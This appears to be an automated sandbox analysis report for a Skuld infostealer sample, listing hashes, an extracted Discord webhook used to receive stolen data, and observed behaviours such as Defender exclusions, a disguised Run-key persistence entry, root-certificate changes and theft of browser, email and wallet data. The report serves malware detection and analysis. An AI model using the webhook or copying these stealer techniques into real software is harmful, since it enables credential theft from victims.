skuld | cc208b61c6aa312b4d2321f0397423c9b19a271f3b0753a8d0c2e020c73d10ca

Analysis

max time kernel
150s
max time network
110s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
27-06-2024 06:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Size

9.5MB
MD5

73c265ce417e5a4d23c841f2c02d5956
SHA1

902c82c28a7f09f42d14c69bc0c50e17f037698b
SHA256

cc208b61c6aa312b4d2321f0397423c9b19a271f3b0753a8d0c2e020c73d10ca
SHA512

6d4beac332adc5f8df96aa2fb99c106e1cc1ee24a003b19305de9ffec0077ed7c0d539742662016f5f804fd9cadfa108c5e2e90e1bc04b5edd52714f7330d045
SSDEEP

98304:pdAPrGpha6grLZ4tJS6NQSBEgR8SF8k2nV3S:EzGphk4tJSIQHuXuV3S

Score

10^/10

skuld execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://ptb.discord.com/api/webhooks/1252696978039636130/g9z0GlomdTtoSV1VeuxuDXCQsAVQeamKh882rI82-5MDpkkCU0uWJpi6P8B7E9BYLsUu

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2624	powershell.exe
1208	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	api.ipify.org
5	api.ipify.org
7	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3436	wmic.exe
2328	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	8	Go-http-client/1.1

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
2624	powershell.exe
2624	powershell.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
368	powershell.exe
368	powershell.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
